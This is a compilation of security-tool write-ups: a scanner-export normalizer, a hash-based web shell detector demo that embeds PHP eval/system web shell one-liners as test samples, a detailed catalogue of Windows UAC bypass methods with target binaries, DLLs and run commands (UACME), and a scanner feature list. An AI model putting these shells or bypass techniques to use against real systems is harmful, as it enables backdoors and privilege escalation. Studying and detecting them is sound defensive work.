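        "scanner": "nessus",
        "asset": row["Host"],
        "port": int(row["Port"]),                      # numbers stay numbers
        "protocol": row["Protocol"].lower(),
        "plugin_id": row["Plugin ID"],
        "plugin_name": row["Name"],
        "cve": row["CVE"] or None,                     # empty string becomes null
        "cvss": float(row["CVSS"]) if row["CVSS"] else None,
        "risk": row["Risk"].lower(),                   # one casing across scanners
    }
    return _keep_rest(rec, row, used, "nessus_")


def normalize_openvas(row):
    used = {"host", "port", "nvt_oid", "nvt_name", "cve", "severity", "threat"}
    port, _, proto = row["port"].partition("/")        # "3389/tcp" -> 3389, tcp
    rec = {
        "scanner": "openvas",
        "asset": row["host"],
        "port": int(port),
        "protocol": proto.lower() or None,
        "plugin_id": row["nvt_oid"],
        "plugin_name": row["nvt_name"],
        "cve": row["cve"] or None,
        "cvss": float(row["severity"]) if row["severity"] else None,
        "risk": row["threat"].lower(),
    }
    return _keep_rest(rec, row, used, "openvas_")


def is_flat(rec):
    """The standard is one level deep: no nested objects or arrays."""
    return all(not isinstance(v, (dict, list)) for v in rec.values())


def normalize_all():
    """Normalize both constructed exports and enforce the standard's invariants."""
    records = [normalize_nessus(r) for r in csv.DictReader(io.StringIO(NESSUS_CSV))]
    records += [normalize_openvas(r) for r in OPENVAS_ROWS]
    for r in records:
        if not is_flat(r) or not set(STANDARD_FIELDS) <= set(r):
            raise ValueError("record violates the flat standard: %r" % (r,))
    return records


def to_ndjson(records):
    """One document per line, the shape a Logstash json_lines input consumes."""
    return "\n".join(json.dumps(r, sort_keys=True) for r in records)


if __name__ == "__main__":
    print(to_ndjson(normalize_all()))
```

Both records come out with the same nine standard keys and typed values, so a single Logstash pipeline and a single set of Kibana visualizations can treat them alike, while the scanner-specific extras (nessus_synopsis, openvas_qod) survive under a prefix instead of being dropped or colliding.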

Link: http://www.kitploit.com/2019/07/vulnwhisperer-create-actionable-data.html

Shellsum – A Defense Tool – Detect Web Shells In Local Directories Via Md5Sum

A defense tool - detect web shells in local directories via md5sum.

Features
- Fast
- Lightweight
- Big database
- Tabled output

Usage

Install:

  git clone https://github.com/ManhNho/shellsum.git
  chmod 755 -R shellsum/
  cd shellsum/
  pip install -r requirements.txt

Run:

  python shellsum.py

To Do
- Smoother output
- Export file report
- Modularization
- Bigger database

References
https://github.com/tennc/webshell

Download Shellsum
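Hash-database detection is cheap and has essentially no false positives, but it only catches byte-exact copies of samples already in the database, which is the caveat worth seeing rather than reading about. The Python below is an added example for this page and not shellsum's code: it hashes candidate files under a webroot and compares the digests against a known-bad set, then builds a throwaway webroot containing a clean file, a known shell, the same shell with one trailing space, and a copy under a non-executable extension. The two-entry hash database and all sample files are constructed for the illustration.

```python
"""Hash-database web shell detection, in the style the tool above describes
(added example; not shellsum's code; the hash database below is constructed
from two trivial samples, not shellsum's real database)."""
import hashlib
import os
import tempfile
from pathlib import Path

SAMPLES = {  # constructed byte-exact samples -> label
    b'<?php @eval($_POST["cmd"]); ?>': "php eval one-liner (constructed sample)",
    b'<?php system($_GET["c"]); ?>':   "php system() shell (constructed sample)",
}
KNOWN_SHELLS = {hashlib.md5(body).hexdigest(): label for body, label in SAMPLES.items()}


def md5_file(path, chunk=65536):
    """Stream the file so large uploads do not need to fit in memory."""
    h = hashlib.md5()
    with open(path, "rb") as f:
        for block in iter(lambda: f.read(chunk), b""):
            h.update(block)
    return h.hexdigest()


def scan_dir(root, db=KNOWN_SHELLS, exts=(".php", ".asp", ".aspx", ".jsp", ".jspx")):
    """Return (path, md5, label) for every file whose digest is in the database."""
    hits = []
    for dirpath, _, files in os.walk(root):
        for name in files:
            if not name.lower().endswith(exts):
                continue                         # extension filter: fast, but see demo()
            path = os.path.join(dirpath, name)
            digest = md5_file(path)
            if digest in db:
                hits.append((path, digest, db[digest]))
    return hits


def demo():
    """Webroot with a clean file, a byte-exact known shell, the same shell with
    one trailing space, and the shell under a .txt name; returns flagged basenames."""
    root = tempfile.mkdtemp()
    Path(root, "index.php").write_bytes(b"<?php echo 'hello'; ?>")
    Path(root, "upload.php").write_bytes(b'<?php @eval($_POST["cmd"]); ?>')
    Path(root, "upload2.php").write_bytes(b'<?php @eval($_POST["cmd"]); ?> ')   # one extra byte
    Path(root, "notes.txt").write_bytes(b'<?php @eval($_POST["cmd"]); ?>')      # skipped by extension
    return sorted(os.path.basename(p) for p, _, _ in scan_dir(root))


if __name__ == "__main__":
    print(demo())
```

Only upload.php is flagged. The copy with a single added byte has a different MD5 and is missed, and so is the identical shell saved as notes.txt because the extension filter never hashes it. Hash matching is therefore a first pass for known samples; anything a defender expects attackers to retouch needs content heuristics (eval/system on request input, base64-decoded payloads) on top of it.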

Link: http://feedproxy.google.com/~r/PentestTools/~3/e2sVilO2ess/shellsum-defense-tool-detect-web-shells.html

UACME – Defeating Windows User Account Control

Defeating Windows User Account Control by abusing the built-in Windows AutoElevate backdoor.

System requirements

x86-32/x64 Windows 7/8/8.1/10 (client; some methods, however, also work on server versions).
An admin account with UAC on default settings is required.

Usage

Run the executable from the command line: akagi32 [Key] [Param] or akagi64 [Key] [Param]. See "Run examples" below for more info.

The first param is the number of the method to use; the second is an optional command (executable file name including full path) to run. The second param can be empty, in which case the program executes an elevated cmd.exe from the system32 folder.

Keys (watch debug output with dbgview or similar for more info):

1. Author: Leo Davidson
   Type: Dll Hijack
   Method: IFileOperation
   Target(s): \system32\sysprep\sysprep.exe
   Component(s): cryptbase.dll
   Implementation: ucmStandardAutoElevation
   Works from: Windows 7 (7600)
   Fixed in: Windows 8.1 (9600)
   How: sysprep.exe hardened LoadFrom manifest elements

2. Author: Leo Davidson derivative
   Type: Dll Hijack
   Method: IFileOperation
   Target(s): \system32\sysprep\sysprep.exe
   Component(s): ShCore.dll
   Implementation: ucmStandardAutoElevation
   Works from: Windows 8.1 (9600)
   Fixed in: Windows 10 TP (> 9600)
   How: Side effect of ShCore.dll moving to \KnownDlls

3. Author: Leo Davidson derivative by WinNT/Pitou
   Type: Dll Hijack
   Method: IFileOperation
   Target(s): \system32\oobe\setupsqm.exe
   Component(s): WdsCore.dll
   Implementation: ucmStandardAutoElevation
   Works from: Windows 7 (7600)
   Fixed in: Windows 10 TH2 (10558)
   How: Side effect of OOBE redesign

4. Author: Jon Ericson, WinNT/Gootkit, mzH
   Type: AppCompat
   Method: RedirectEXE Shim
   Target(s): \system32\cliconfg.exe
   Component(s): -
   Implementation: ucmShimRedirectEXE
   Works from: Windows 7 (7600)
   Fixed in: Windows 10 TP (> 9600)
   How: Sdbinst.exe autoelevation removed, KB3045645/KB3048097 for the remaining Windows versions

5. Author: WinNT/Simda
   Type: Elevated COM interface
   Method: ISecurityEditor
   Target(s): HKLM registry keys
   Component(s): -
   Implementation: ucmSimdaTurnOffUac
   Works from: Windows 7 (7600)
   Fixed in: Windows 10 TH1 (10147)
   How: ISecurityEditor interface method changed

6. Author: Win32/Carberp
   Type: Dll Hijack
   Method: WUSA
   Target(s): \ehome\mcx2prov.exe, \system32\migwiz\migwiz.exe
   Component(s): WdsCore.dll, CryptBase.dll, CryptSP.dll
   Implementation: ucmWusaMethod
   Works from: Windows 7 (7600)
   Fixed in: Windows 10 TH1 (10147)
   How: WUSA /extract option removed

7. Author: Win32/Carberp derivative
   Type: Dll Hijack
   Method: WUSA
   Target(s): \system32\cliconfg.exe
   Component(s): ntwdblib.dll
   Implementation: ucmWusaMethod
   Works from: Windows 7 (7600)
   Fixed in: Windows 10 TH1 (10147)
   How: WUSA /extract option removed

8. Author: Leo Davidson derivative by Win32/Tilon
   Type: Dll Hijack
   Method: IFileOperation
   Target(s): \system32\sysprep\sysprep.exe
   Component(s): Actionqueue.dll
   Implementation: ucmStandardAutoElevation
   Works from: Windows 7 (7600)
   Fixed in: Windows 8.1 (9600)
   How: sysprep.exe hardened LoadFrom manifest

9. Author: Leo Davidson, WinNT/Simda, Win32/Carberp derivative
   Type: Dll Hijack
   Method: IFileOperation, ISecurityEditor, WUSA
   Target(s): IFEO registry keys, \system32\cliconfg.exe
   Component(s): Attacker defined Application Verifier Dll
   Implementation: ucmAvrfMethod
   Works from: Windows 7 (7600)
   Fixed in: Windows 10 TH1 (10147)
   How: WUSA /extract option removed, ISecurityEditor interface method changed

10. Author: WinNT/Pitou, Win32/Carberp derivative
    Type: Dll Hijack
    Method: IFileOperation, WUSA
    Target(s): \system32\{New}or{Existing}\{autoelevated}.exe, e.g. winsat.exe
    Component(s): Attacker defined dll, e.g. PowProf.dll, DevObj.dll
    Implementation: ucmWinSATMethod
    Works from: Windows 7 (7600)
    Fixed in: Windows 10 TH2 (10548)
    How: AppInfo elevated application path control hardening

11. Author: Jon Ericson, WinNT/Gootkit, mzH
    Type: AppCompat
    Method: Shim Memory Patch
    Target(s): \system32\iscsicli.exe
    Component(s): Attacker prepared shellcode
    Implementation: ucmShimPatch
    Works from: Windows 7 (7600)
    Fixed in: Windows 8.1 (9600)
    How: Sdbinst.exe autoelevation removed, KB3045645/KB3048097 for the remaining Windows versions

12. Author: Leo Davidson derivative
    Type: Dll Hijack
    Method: IFileOperation
    Target(s): \system32\sysprep\sysprep.exe
    Component(s): dbgcore.dll
    Implementation: ucmStandardAutoElevation
    Works from: Windows 10 TH1 (10240)
    Fixed in: Windows 10 TH2 (10565)
    How: sysprep.exe manifest updated

13. Author: Leo Davidson derivative
    Type: Dll Hijack
    Method: IFileOperation
    Target(s): \system32\mmc.exe EventVwr.msc
    Component(s): elsext.dll
    Implementation: ucmMMCMethod
    Works from: Windows 7 (7600)
    Fixed in: Windows 10 RS1 (14316)
    How: Missing dependency removed

14. Author: Leo Davidson, WinNT/Sirefef derivative
    Type: Dll Hijack
    Method: IFileOperation
    Target(s): \system32\credwiz.exe, \system32\wbem\oobe.exe
    Component(s): netutils.dll
    Implementation: ucmSirefefMethod
    Works from: Windows 7 (7600)
    Fixed in: Windows 10 TH2 (10548)
    How: AppInfo elevated application path control hardening

15. Author: Leo Davidson, Win32/Addrop, Metasploit derivative
    Type: Dll Hijack
    Method: IFileOperation
    Target(s): \system32\cliconfg.exe
    Component(s): ntwdblib.dll
    Implementation: ucmGenericAutoelevation
    Works from: Windows 7 (7600)
    Fixed in: Windows 10 RS1 (14316)
    How: Cliconfg.exe autoelevation removed

16. Author: Leo Davidson derivative
    Type: Dll Hijack
    Method: IFileOperation
    Target(s): \system32\GWX\GWXUXWorker.exe, \system32\inetsrv\inetmgr.exe
    Component(s): SLC.dll
    Implementation: ucmGWX
    Works from: Windows 7 (7600)
    Fixed in: Windows 10 RS1 (14316)
    How: AppInfo elevated application path control and inetmgr executable hardening

17. Author: Leo Davidson derivative
    Type: Dll Hijack (Import forwarding)
    Method: IFileOperation
    Target(s): \system32\sysprep\sysprep.exe
    Component(s): unbcl.dll
    Implementation: ucmStandardAutoElevation2
    Works from: Windows 8.1 (9600)
    Fixed in: Windows 10 RS1 (14371)
    How: sysprep.exe manifest updated

18. Author: Leo Davidson derivative
    Type: Dll Hijack (Manifest)
    Method: IFileOperation
    Target(s): \system32\taskhost.exe, \system32\tzsync.exe (any ms exe without manifest)
    Component(s): Attacker defined
    Implementation: ucmAutoElevateManifest
    Works from: Windows 7 (7600)
    Fixed in: Windows 10 RS1 (14371)
    How: Manifest parsing logic reviewed

19. Author: Leo Davidson derivative
    Type: Dll Hijack
    Method: IFileOperation
    Target(s): \system32\inetsrv\inetmgr.exe
    Component(s): MsCoree.dll
    Implementation: ucmInetMgrMethod
    Works from: Windows 7 (7600)
    Fixed in: Windows 10 RS1 (14376)
    How: inetmgr.exe executable manifest hardening, MitigationPolicy->ProcessImageLoadPolicy->PreferSystem32Images

20. Author: Leo Davidson derivative
    Type: Dll Hijack
    Method: IFileOperation
    Target(s): \system32\mmc.exe, Rsop.msc
    Component(s): WbemComn.dll
    Implementation: ucmMMCMethod
    Works from: Windows 7 (7600)
    Fixed in: Windows 10 RS3 (16232)
    How: Target requires wbemcomn.dll to be signed by MS

21. Author: Leo Davidson derivative
    Type: Dll Hijack
    Method: IFileOperation, SxS DotLocal
    Target(s): \system32\sysprep\sysprep.exe
    Component(s): comctl32.dll
    Implementation: ucmSXSMethod
    Works from: Windows 7 (7600)
    Fixed in: Windows 10 RS3 (16232)
    How: MitigationPolicy->ProcessImageLoadPolicy->PreferSystem32Images

22. Author: Leo Davidson derivative
    Type: Dll Hijack
    Method: IFileOperation, SxS DotLocal
    Target(s): \system32\consent.exe
    Component(s): comctl32.dll
    Implementation: ucmSXSMethod
    Works from: Windows 7 (7600)
    Fixed in: unfixed
    How: -

23. Author: Leo Davidson derivative
    Type: Dll Hijack
    Method: IFileOperation
    Target(s): \system32\pkgmgr.exe
    Component(s): DismCore.dll
    Implementation: ucmDismMethod
    Works from: Windows 7 (7600)
    Fixed in: unfixed
    How: -

24. Author: BreakingMalware
    Type: Shell API
    Method: Environment variables expansion
    Target(s): \system32\CompMgmtLauncher.exe
    Component(s): Attacker defined
    Implementation: ucmCometMethod
    Works from: Windows 7 (7600)
    Fixed in: Windows 10 RS2 (15031)
    How: CompMgmtLauncher.exe autoelevation removed

25. Author: Enigma0x3
    Type: Shell API
    Method: Registry key manipulation
    Target(s): \system32\EventVwr.exe, \system32\CompMgmtLauncher.exe
    Component(s): Attacker defined
    Implementation: ucmHijackShellCommandMethod
    Works from: Windows 7 (7600)
    Fixed in: Windows 10 RS2 (15031)
    How: EventVwr.exe redesigned, CompMgmtLauncher.exe autoelevation removed

26. Author: Enigma0x3
    Type: Race Condition
    Method: File overwrite
    Target(s): %temp%\GUID\dismhost.exe
    Component(s): LogProvider.dll
    Implementation: ucmDiskCleanupRaceCondition
    Works from: Windows 10 TH1 (10240)
    AlwaysNotify compatible
    Fixed in: Windows 10 RS2 (15031)
    How: File security permissions altered

27. Author: ExpLife
    Type: Elevated COM interface
    Method: IARPUninstallStringLauncher
    Target(s): Attacker defined
    Component(s): Attacker defined
    Implementation: ucmUninstallLauncherMethod
    Works from: Windows 7 (7600)
    Fixed in: Windows 10 RS3 (16199)
    How: UninstallStringLauncher interface removed from COMAutoApprovalList

28. Author: Exploit/Sandworm
    Type: Whitelisted component
    Method: InfDefaultInstall
    Target(s): Attacker defined
    Component(s): Attacker defined
    Implementation: ucmSandwormMethod
    Works from: Windows 7 (7600)
    Fixed in: Windows 8.1 (9600)
    How: InfDefaultInstall.exe removed from g_lpAutoApproveEXEList (MS14-060)

29. Author: Enigma0x3
    Type: Shell API
    Method: Registry key manipulation
    Target(s): \system32\sdclt.exe
    Component(s): Attacker defined
    Implementation: ucmAppPathMethod
    Works from: Windows 10 TH1 (10240)
    Fixed in: Windows 10 RS3 (16215)
    How: Shell API update

30. Author: Leo Davidson derivative, lhc645
    Type: Dll Hijack
    Method: WOW64 logger
    Target(s): \syswow64\{any elevated exe, e.g. wusa.exe}
    Component(s): wow64log.dll
    Implementation: ucmWow64LoggerMethod
    Works from: Windows 7 (7600)
    Fixed in: unfixed
    How: -

31. Author: Enigma0x3
    Type: Shell API
    Method:
Registry key manipulationTarget(s): \system32\sdclt.exeComponent(s): Attacker definedImplementation: ucmSdcltIsolatedCommandMethodWorks from: Windows 10 TH1 (10240)Fixed in: Windows 10 RS4 (17025) How: Shell API / Windows components updateAuthor: xi-tauw Type: Dll HijackMethod: UIPI bypass with uiAccess applicationTarget(s): \Program Files\Windows Media Player\osk.exe, \system32\EventVwr.exe, \system32\mmc.exeComponent(s): duser.dll, osksupport.dllImplementation: ucmUiAccessMethodWorks from: Windows 7 (7600)Fixed in: unfixed , How: -Author: winscripting.blog Type: Shell APIMethod: Registry key manipulationTarget(s): \system32\fodhelper.exe, \system32\computerdefaults.exeComponent(s): Attacker definedImplementation: ucmMsSettingsDelegateExecuteMethodWorks from: Windows 10 TH1 (10240)Fixed in: unfixed , How: -Author: James Forshaw Type: Shell APIMethod: Environment variables expansionTarget(s): \system32\svchost.exe via \system32\schtasks.exeComponent(s): Attacker definedImplementation: ucmDiskCleanupEnvironmentVariableWorks from: Windows 8.1 (9600)AlwaysNotify compatibleFixed in: unfixed , How: -Author: CIA & James Forshaw Type: ImpersonationMethod: Token ManipulationsTarget(s): Autoelevated applicationsComponent(s): Attacker definedImplementation: ucmTokenModificationWorks from: Windows 7 (7600)AlwaysNotify compatible, see noteFixed in: Windows 10 RS5 (17686) How: ntoskrnl.exe->SeTokenCanImpersonate additional access token check addedAuthor: Thomas Vanhoutte aka SandboxEscaper Type: Race conditionMethod: NTFS reparse point & Dll HijackTarget(s): wusa.exeComponent(s): dcomcnfg.exe, mmc.exe, ole32.dll, MsCoree.dllImplementation: ucmJunctionMethodWorks from: Windows 7 (7600)Fixed in: unfixed , How: -Author: Ernesto Fernandez, Thomas Vanhoutte Type: Dll HijackMethod: SxS DotLocal, NTFS reparse pointTarget(s): \system32\dccw.exeComponent(s): GdiPlus.dllImplementation: ucmSXSDccwMethodWorks from: Windows 7 (7600)Fixed in: unfixed , How: -Author: Clement Rouault Type: 
Whitelisted componentMethod: APPINFO command line spoofingTarget(s): \system32\mmc.exeComponent(s): Attacker definedImplementation: ucmHakrilMethodWorks from: Windows 7 (7600)Fixed in: unfixed , How: -Author: Stefan Kanthak Type: Dll HijackMethod: .NET Code ProfilerTarget(s): \system32\mmc.exeComponent(s): Attacker definedImplementation: ucmCorProfilerMethodWorks from: Windows 7 (7600)Fixed in: unfixed , How: -Author: Ruben Boonen Type: COM Handler HijackMethod: Registry key manipulationTarget(s): \system32\mmc.exe, \System32\recdisc.exeComponent(s): Attacker definedImplementation: ucmCOMHandlersMethodWorks from: Windows 7 (7600)Fixed in: Windows 10 19H1 (18362) How: Side effect of Windows changesAuthor: Oddvar Moe Type: Elevated COM interfaceMethod: ICMLuaUtilTarget(s): Attacker definedComponent(s): Attacker definedImplementation: ucmCMLuaUtilShellExecMethodWorks from: Windows 7 (7600)Fixed in: unfixed , How: -Author: BreakingMalware and Enigma0x3 Type: Elevated COM interfaceMethod: IFwCplLuaTarget(s): Attacker definedComponent(s): Attacker definedImplementation: ucmFwCplLuaMethodWorks from: Windows 7 (7600)Fixed in: Windows 10 RS4 (17134) How: Shell API updateAuthor: Oddvar Moe derivative Type: Elevated COM interfaceMethod: IColorDataProxy, ICMLuaUtilTarget(s): Attacker definedComponent(s): Attacker definedImplementation: ucmDccwCOMMethodWorks from: Windows 7 (7600)Fixed in: unfixed , How: -Author: bytecode77 Type: Shell APIMethod: Environment variables expansionTarget(s): Multiple auto-elevated processesComponent(s): Various per targetImplementation: ucmVolatileEnvMethodWorks from: Windows 7 (7600)Fixed in: Windows 10 RS3 (16299) How: Current user system directory variables ignored during process creationAuthor: bytecode77 Type: Shell APIMethod: Registry key manipulationTarget(s): \system32\slui.exeComponent(s): Attacker definedImplementation: ucmSluiHijackMethodWorks from: Windows 8.1 (9600)Fixed in: unfixed , How: -Author: Anonymous Type: Race ConditionMethod: 
Registry key manipulationTarget(s): \system32\BitlockerWizardElev.exeComponent(s): Attacker definedImplementation: ucmBitlockerRCMethodWorks from: Windows 7 (7600)Fixed in: Windows 10 RS4 (>16299) How: Shell API updateAuthor: clavoillotte & 3gstudent Type: COM Handler HijackMethod: Registry key manipulationTarget(s): \system32\mmc.exeComponent(s): Attacker definedImplementation: ucmCOMHandlersMethod2Works from: Windows 7 (7600)Fixed in: Windows 10 19H1 (18362) How: Side effect of Windows changesAuthor: deroko Type: Elevated COM interfaceMethod: ISPPLUAObjectTarget(s): Attacker definedComponent(s): Attacker definedImplementation: ucmSPPLUAObjectMethodWorks from: Windows 7 (7600)Fixed in: Windows 10 RS5 (17763) How: ISPPLUAObject interface method changedAuthor: RinN Type: Elevated COM interfaceMethod: ICreateNewLinkTarget(s): \system32\TpmInit.exeComponent(s): WbemComn.dllImplementation: ucmCreateNewLinkMethodWorks from: Windows 7 (7600)Fixed in: Windows 10 RS1 (14393) How: Side effect of consent.exe COMAutoApprovalList introductionAuthor: Anonymous Type: Elevated COM interfaceMethod: IDateTimeStateWrite, ISPPLUAObjectTarget(s): w32time serviceComponent(s): w32time.dllImplementation: ucmDateTimeStateWriterMethodWorks from: Windows 7 (7600)Fixed in: Windows 10 RS5 (17763) How: Side effect of ISPPLUAObject interface changeAuthor: bytecode77 derivative Type: Elevated COM interfaceMethod: IAccessibilityCplAdminTarget(s): \system32\rstrui.exeComponent(s): Attacker definedImplementation: ucmAcCplAdminMethodWorks from: Windows 7 (7600)Fixed in: Windows 10 RS4 (17134) How: Shell API updateAuthor: David Wells Type: Whitelisted componentMethod: AipNormalizePath parsing abuseTarget(s): Attacker definedComponent(s): Attacker definedImplementation: ucmDirectoryMockMethodWorks from: Windows 7 (7600)Fixed in: unfixed , How: -Author: Emeric Nasi Type: Shell APIMethod: Registry key manipulationTarget(s): \system32\sdclt.exeComponent(s): Attacker definedImplementation: 
ucmShellDelegateExecuteCommandMethodWorks from: Windows 10 (14393)Fixed in: unfixed , How: -Author: egre55 Type: Dll HijackMethod: Dll path search abuseTarget(s): \syswow64\SystemPropertiesAdvanced.exe and other SystemProperties*.exeComponent(s): \AppData\Local\Microsoft\WindowsApps\srrstr.dllImplementation: ucmEgre55MethodWorks from: Windows 10 (14393)Fixed in: unfixed , How: -Author: James Forshaw Type: GUI HackMethod: UIPI bypass with token modificationTarget(s): \system32\osk.exe, \system32\msconfig.exeComponent(s): Attacker definedImplementation: ucmTokenModUIAccessMethodWorks from: Windows 7 (7600)Fixed in: unfixed , How: -Author: Hashim Jawad Type: Shell APIMethod: Registry key manipulationTarget(s): \system32\WSReset.exeComponent(s): Attacker definedImplementation: ucmShellDelegateExecuteCommandMethodWorks from: Windows 10 (17134)Fixed in: unfixed , How: -Author: Leo Davidson derivative by Win32/Gapz Type: Dll HijackMethod: IFileOperationTarget(s): \system32\sysprep\sysprep.exeComponent(s): unattend.dllImplementation: ucmStandardAutoElevationWorks from: Windows 7 (7600)Fixed in: Windows 8.1 (9600) How: sysprep.exe hardened LoadFrom manifest elementsNote:Method (6) unavailable in wow64 environment starting from Windows 8;Method (11) (54) implemented only in x86-32 version;Method (13) (19) (30) (38) (50) implemented only in x64 version;Method (14) require process injection, wow64 unsupported, use x64 version of this tool;Method (26) is still working, however it main advantage was UAC bypass on AlwaysNotify level. 
Since 15031 it is gone;Method (30) require x64 because it abuses WOW64 subsystem feature;Method (35) AlwaysNotify compatible as there always will be running autoelevated apps or user will have to launch them anyway;Method (38) require internet connection as it executes remote script located at github.com/hfiref0x/Beacon/blob/master/uac/exec.html;Method (55) is not really reliable (as any GUI hacks) and included just for fun.Run examples:akagi32.exe 1akagi64.exe 3akagi32 1 c:\windows\system32\calc.exeakagi64 3 c:\windows\system32\charmap.exeWarningThis tool shows ONLY popular UAC bypass method used by malware, and reimplement some of them in a different way improving original concepts. There are exists different, not yet known to general public methods, be aware of this;Using (5) method will permanently turn off UAC (after reboot), make sure to do this in test environment or don’t forget to re-enable UAC after tool usage;Using (5), (9) methods will permanently compromise security of target keys (UAC Settings key for (5) and IFEO for (9)), if you do tests on your real machine – restore keys security manually after you complete this tool usage;This tool is not intended for AV tests and not tested to work in aggressive AV environment, if you still plan to use it with installed bloatware AV soft – you use it at your own risk;Some AV may flag this tool as HackTool, MSE/WinDefender constantly marks it as malware, nope;If you run this program on real computer remember to remove all program leftovers after usage, for more info about files it drops to system folders see source code;Most of methods created for x64, with no x86-32 support in mind. 
I don’t see any sense in supporting 32 bit versions of Windows or wow64, however with small tweaks most of them will run under wow64 as well.If you wondering why this still exist and work here is the explanation, an official Microsoft WHITEFLAG (including totally incompetent statements as bonus) https://blogs.msdn.microsoft.com/oldnewthing/20160816-00/?p=94105Windows 10 support and testing policyEOL’ed versions of Windows 10 are not supported and therefore not tested (at moment of writing EOL’ed Windows 10 versions are: TH1 (10240), TH2 (10586));Insider builds are not supported as methods may be fixed there.ProtectionAccount without administrative privileges.Malware usageIt is currently known that UACMe used by Adware/Multiplug (9), by Win32/Dyre (3), by Win32/Empercrypt (10 & 13), by IcedID downloader (35 & 41). We do not take any responsibility for this tool usage in the malicious purposes. It is free, open-source and provided AS-IS for everyone.Other usageCurrently used as "signature" by "THOR APT" scanner (handmade pattern matching fraudware from Germany). We do not take any responsibility for this tool usage in the fraudware;The scamware project called "uacguard" has references to UACMe from their platform. We do not take any responsibility for this tool usage in the scamware. The repository https://github.com/hfiref0x/UACME and it contents are the only genuine source for UACMe code. We have nothing to do with external links to this project, mentions anywhere as well as modifications (forks);In July 2016 so-called "security company" Cymmetria released report about script-kiddie malware bundle called "Patchwork" and false flagged it as APT. They stated it was using "UACME method", which in fact is just slightly and unprofessionally modified injector dll from UACMe v1.9 and was using Carberp/Pitou hybrid method in malware self-implemented way. 
We do not take any responsibility for UACMe usage in the dubious advertising campaigns from third party "security companies".BuildUACMe comes with full source code, written in C with some parts written in C#;In order to build from source you need Microsoft Visual Studio 2013/2015 U2 and later versions.Instructions Select Platform ToolSet first for project in solution you want to build (Project->Properties->General): v120 for Visual Studio 2013;v140 for Visual Studio 2015;v141 for Visual Studio 2017. For v140 and above set Target Platform Version (Project->Properties->General): If v140 then select 8.1 (Note that Windows 8.1 SDK must be installed);If v141 then select 10.0.17134.0 (Note that Windows 10.0.17134 SDK must be installed). Note that Fujinami module built with .NET Framework 3.0 (this is requirement for it work), so .NET Framework 3.0 must be installed if you want to build this module. Can be built with SDK 8.1/10.17134/10.17763. ReferencesWindows 7 UAC whitelist, http://www.pretentiousname.com/misc/win7_uac_whitelist2.htmlMalicious Application Compatibility Shims, https://www.blackhat.com/docs/eu-15/materials/eu-15-Pierce-Defending-Against-Malicious-Application-Compatibility-Shims-wp.pdfJunfeng Zhang from WinSxS dev team blog, https://blogs.msdn.microsoft.com/junfeng/Beyond good ol’ Run key, series of articles, http://www.hexacorn.com/blogKernelMode.Info UACMe thread, http://www.kernelmode.info/forum/viewtopic.php?f=11&t=3643Command Injection/Elevation – Environment Variables Revisited, https://breakingmalware.com/vulnerabilities/command-injection-and-elevation-environment-variables-revisited"Fileless" UAC Bypass Using eventvwr.exe and Registry Hijacking, https://enigma0x3.net/2016/08/15/fileless-uac-bypass-using-eventvwr-exe-and-registry-hijacking/Bypassing UAC on Windows 10 using Disk Cleanup, https://enigma0x3.net/2016/07/22/bypassing-uac-on-windows-10-using-disk-cleanup/Using IARPUninstallStringLauncher COM interface to bypass UAC, 
http://www.freebuf.com/articles/system/116611.htmlBypassing UAC using App Paths, https://enigma0x3.net/2017/03/14/bypassing-uac-using-app-paths/"Fileless" UAC Bypass using sdclt.exe, https://enigma0x3.net/2017/03/17/fileless-uac-bypass-using-sdclt-exe/UAC Bypass or story about three escalations, https://habrahabr.ru/company/pm/blog/328008/Exploiting Environment Variables in Scheduled Tasks for UAC Bypass, https://tyranidslair.blogspot.ru/2017/05/exploiting-environment-variables-in.htmlFirst entry: Welcome and fileless UAC bypass, https://winscripting.blog/2017/05/12/first-entry-welcome-and-uac-bypass/Reading Your Way Around UAC in 3 parts: https://tyranidslair.blogspot.ru/2017/05/reading-your-way-around-uac-part-1.htmlhttps://tyranidslair.blogspot.ru/2017/05/reading-your-way-around-uac-part-2.htmlhttps://tyranidslair.blogspot.ru/2017/05/reading-your-way-around-uac-part-3.htmlResearch on CMSTP.exe, https://msitpros.com/?p=3960UAC bypass via elevated .NET applications, https://offsec.provadys.com/UAC-bypass-dotnet.htmlUAC Bypass by Mocking Trusted Directories, https://medium.com/tenable-techblog/uac-bypass-by-mocking-trusted-directories-24a96675f6eYet another sdclt UAC bypass, http://blog.sevagas.com/?Yet-another-sdclt-UAC-bypassUAC Bypass via SystemPropertiesAdvanced.exe and DLL Hijacking, https://egre55.github.io/system-properties-uac-bypass/Accessing Access Tokens for UIAccess, https://tyranidslair.blogspot.com/2019/02/accessing-access-tokens-for-uiaccess.htmlFileless UAC Bypass in Windows Store Binary, https://www.activecyber.us/1/post/2019/03/windows-uac-bypass.htmlAuthors(c) 2014 – 2019 UACMe ProjectDownload UACME

Link: http://feedproxy.google.com/~r/PentestTools/~3/SVc2u0HEg4k/uacme-defeating-windows-user-account.html

Vxscan – Comprehensive Scanning Tool

Python3 comprehensive scanning tool, mainly used for sensitive file detection (directory scanning and JS leaked-interface discovery), WAF/CDN identification, port scanning, fingerprint/service identification, operating system identification, weak password detection, POC scanning, SQL injection, CDN bypass (real IP discovery), and reverse-IP (side-site) lookup.

Update 2019.6.18
- Fixed the problem of fingerprint recognition on IIS websites raising an error; modified apps.json
- Removed some third-party libraries and scripts that are prone to errors
- If the scan finishes in a flash, it is because the program first checks DNS resolution and ping reachability of the target.
- The first time you use Vxscan, fake_useragent will load the UA list from https://fake-useragent.herokuapp.com/browsers/0.1.11, and a load timeout error may occur.

Requirements
Python version > 3.6
requests, tqdm, pyfiglet, fake-useragent, beautifulsoup4, geoip2, tldextract, python-nmap, lxml, pymongo, virustotal_python

apt install libpq-dev nmap
wget https://geolite.maxmind.com/download/geoip/database/GeoLite2-City.tar.gz
After decompressing, put the GeoLite2-City.mmdb inside into vxscan/db/GeoLite2-City.mmdb
wget https://geolite.maxmind.com/download/geoip/database/GeoLite2-ASN.tar.gz
After decompressing, put the GeoLite2-ASN.mmdb inside into vxscan/db/GeoLite2-ASN.mmdb
pip3 install -r requirements.txt

Features
- Generate a dictionary list using the Cartesian product method; supports custom dictionary lists
- Random UserAgent, XFF, X-Real-IP
- Custom 404 page recognition: request random (non-existent) pages and then compare similarity through difflib, which also identifies custom 302 redirects
- When scanning directories, first detect the HTTP ports and add all HTTP ports of one host to the scan targets
- Filter invalid Content-Type and invalid status codes
- WAF/CDN detection
- Use sockets to send packets to detect common ports, and send different payloads to fingerprint port services
- Hosts that show every port open (portspoof) are automatically skipped
- Call wappalyzer.json and WebEye to determine the website fingerprint
- Websites detected to be behind a CDN or WAF are automatically skipped
